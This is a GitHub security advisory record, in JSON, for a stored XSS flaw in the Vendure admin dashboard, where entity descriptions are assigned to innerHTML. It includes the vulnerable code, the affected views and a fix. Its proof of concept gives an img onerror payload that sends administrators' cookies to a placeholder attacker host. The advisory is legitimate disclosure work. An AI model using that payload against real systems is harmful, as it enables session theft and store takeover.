{"id":"GHSA-xhq9-whgq-49j5","summary":"Vendure has stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions","details":"# Stored XSS in the Admin Dashboard via unsafe HTML-stripping (`innerHTML`) of entity descriptions\n\n**Package:** @vendure/dashboard (vendure-ecommerce/vendure, latest master) · \n\n## Summary\nThe dashboard's `RichTextDescriptionCell` \"strips HTML\" from an entity's `description` by assigning it to a live element's `innerHTML` and reading back `textContent`. This pattern still **executes** active markup: a `description` containing `\u003cimg src=x onerror=…\u003e` runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing `onerror`). Because `description` is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a **higher-privilege administrator's** browser when they open the corresponding list — stored XSS leading to admin-session compromise.\n\n## Vulnerable code\n`packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx`\n```tsx\nexport const RichTextDescriptionCell: DataTableCellComponent\u003c{ description: string }\u003e = ({ cell }) =\u003e {\n    const value = cell.getValue();\n    const textContent = useMemo(() =\u003e {\n        if (!value) return '';\n        const div = document.createElement('div');\n        div.innerHTML = value;          // line 51 — parses/loads active markup; \u003cimg onerror\u003e fires here\n        return div.textContent ?? '';   // line 52 — reading textContent does NOT undo the side effect\n    }, [value]);\n    ...\n}\n```\n`innerHTML` does not run `\u003cscript\u003e`, but it **does** trigger resource loads / event handlers such as `\u003cimg src=x onerror=...\u003e`, `\u003cimage\u003e`, `\u003csvg\u003e` handlers — even on a detached element — so the assignment itself is the sink. Reading `textContent` afterwards is irrelevant; the handler has already executed.\n\n## Reachable from (all use this cell for the `description` column)\n- `_products/products.tsx:53`, `_collections/collections.tsx`, `_promotions/promotions.tsx:62`, `_payment-methods/payment-methods.tsx:57`, `_shipping-methods/shipping-methods.tsx:39`.\n\nAll of these are `description` fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes **channel-scoped admins**.\n\n## Proof of concept\n1. As an administrator with `UpdateCatalog`/`UpdateProduct` (e.g. a channel-scoped admin), set a Product's `description` to:\n   `\u003cimg src=x onerror=\"fetch('https://attacker.example/'+encodeURIComponent(document.cookie))\"\u003e`\n2. Any administrator who opens the **Products** list in the dashboard renders `RichTextDescriptionCell` for that row → `div.innerHTML = description` → the `onerror` executes in their session.\n3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → **cross-privilege / cross-channel admin takeover** (chains directly with the channel-scoping IDOR class already reported).\n\n## Impact\nStored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover.\n\n## Suggested fix\nStrip HTML with an **inert** parser (no script/resource execution) instead of a live element, or sanitize before display:\n```ts\n// inert: DOMParser documents do not execute scripts or load resources\nconst textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? '';\n```\n(Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other `element.innerHTML = \u003cuntrusted\u003e` assignments used for \"stripping\".","aliases":["CVE-2026-63459"],"modified":"2026-09-17T15:00:06.524070422Z","published":"2026-09-17T14:49:34Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-79"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-09-17T14:49:34Z"},"references":[{"type":"WEB","url":"https://github.com/vendurehq/vendure/security/advisories/GHSA-xhq9-whgq-49j5"},{"type":"WEB","url":"https://github.com/vendurehq/vendure/commit/d7aa42a3f0cb524297a1a2fdf700e4aba9aca684"},{"type":"PACKAGE","url":"https://github.com/vendurehq/vendure"},{"type":"WEB","url":"https://github.com/vendurehq/vendure/releases/tag/v3.6.5"}],"affected":[{"package":{"name":"@vendure/dashboard","ecosystem":"npm","purl":"pkg:npm/%40vendure/dashboard"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.6.5"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-xhq9-whgq-49j5/GHSA-xhq9-whgq-49j5.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"}]}